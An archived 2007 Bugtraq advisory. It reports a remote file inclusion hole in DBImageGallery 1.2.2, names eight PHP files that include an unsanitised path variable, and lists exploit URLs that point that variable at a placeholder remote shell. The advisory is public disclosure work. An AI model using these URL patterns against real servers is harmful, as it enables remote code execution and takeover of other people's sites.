lists.openwall.net   lists  /  announce  owl-users  owl-dev  john-users  john-dev  passwdqc-users  yescrypt  popa3d-users  /  oss-security  kernel-hardening  musl  sabotage  tlsify  passwords  /  crypt-dev  xvendor  /  Bugtraq  Full-Disclosure  linux-kernel  linux-netdev  linux-ext4  linux-hardening  linux-cve-announce  PHC 
Open Source and information security mailing list archives
 
Hash Suite: Windows password security audit tool. GUI, reports in PDF.
[<prev] [next>] [day] [month] [year] [list]
Date: Fri, 02 Mar 2007 21:30:22 +0800
From: "RaeD Hasadya" <raed@...mail.com>
To: Bugtraq@...urityfocus.com
Subject: Remote File Include In DBImageGallery

Remote File Include In DBImageGallery 1.2.2
Discovered By : Hasadya Raed
Contact Me : RaeD@...Mail.Com
Download Script : 
http://www.dbscripts.net/download/?file=1

B.Files:

admin/attributes.php     -> require_once $donsimg_base_path
admin/images.php          -> require_once $donsimg_base_path
admin/scan.php             -> require_once $donsimg_base_path
includes/attributes.php -> require_once $donsimg_base_path
includes/db_utils.php    -> require_once $donsimg_base_path
includes/images.php     -> require_once $donsimg_base_path
includes/utils.php          -> require_once $donsimg_base_path
includes/values.php      -> require_once $donsimg_base_path
 
Exploits : 

http://www.victim.com/path/admin/attributes.php?donsimg_base_path=[Shell-Attack]
http://www.victim.com/path/admin/images.php?donsimg_base_path=[Shell-Attack]
http://www.victim.com/path/admin/scan.php?donsimg_base_path=[Shell-Attack]
http://www.victim.com/path/includes/attributes.php?donsimg_base_path=[Shell-Attack]
http://www.victim.com/path/includes/db_utils.php?donsimg_base_path=[Shell-Attack]
http://www.victim.com/path/includes/images.php?donsimg_base_path=[Shell-Attack]
http://www.victim.com/path/includes/utils.php?donsimg_base_path=[Shell-Attack]
http://www.victim.com/path/includes/values.php?donsimg_base_path=[Shell-Attack]


-- 
_______________________________________________
Get your free email from http://bsdmail.com

Powered by blists - more mailing lists